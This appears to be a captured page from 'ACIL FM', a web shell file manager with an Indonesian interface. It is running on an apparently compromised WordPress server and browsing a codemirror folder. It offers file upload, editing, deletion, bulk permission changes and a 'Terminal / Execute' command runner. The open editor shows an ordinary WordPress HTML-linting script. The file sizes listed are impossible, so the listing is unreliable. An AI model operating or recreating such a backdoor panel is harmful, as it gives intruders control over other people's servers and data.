ACIL FM
Dark
Refresh
Current DIR:
/home/mhhtmff/www/site BKP/wp-includes/js/codemirror
/
home
mhhtmff
www
site BKP
wp-includes
js
codemirror
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
codemirror.min.css
15.53 MB
chmod
View
DL
Edit
Rename
Delete
codemirror.min.js
571.69 MB
chmod
View
DL
Edit
Rename
Delete
csslint.js
358.17 MB
chmod
View
DL
Edit
Rename
Delete
esprima.js
276.51 MB
chmod
View
DL
Edit
Rename
Delete
fakejshint.js
1002 B
chmod
View
DL
Edit
Rename
Delete
htmlhint-kses.js
984 B
chmod
View
DL
Edit
Rename
Delete
htmlhint.js
17.32 MB
chmod
View
DL
Edit
Rename
Delete
jsonlint.js
15.81 MB
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/mhhtmff/www/site BKP/wp-includes/js/codemirror/htmlhint-kses.js
/* global HTMLHint */ /* eslint no-magic-numbers: ["error", { "ignore": [0, 1] }] */ HTMLHint.addRule({ id: 'kses', description: 'Element or attribute cannot be used.', init: function( parser, reporter, options ) { 'use strict'; var self = this; parser.addListener( 'tagstart', function( event ) { var attr, col, attrName, allowedAttributes, i, len, tagName; tagName = event.tagName.toLowerCase(); if ( ! options[ tagName ] ) { reporter.error( 'Tag <' + event.tagName + '> is not allowed.', event.line, event.col, self, event.raw ); return; } allowedAttributes = options[ tagName ]; col = event.col + event.tagName.length + 1; for ( i = 0, len = event.attrs.length; i < len; i++ ) { attr = event.attrs[ i ]; attrName = attr.name.toLowerCase(); if ( ! allowedAttributes[ attrName ] ) { reporter.error( 'Tag attribute [' + attr.raw + ' ] is not allowed.', event.line, col + attr.index, self, attr.raw ); } } }); } });
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply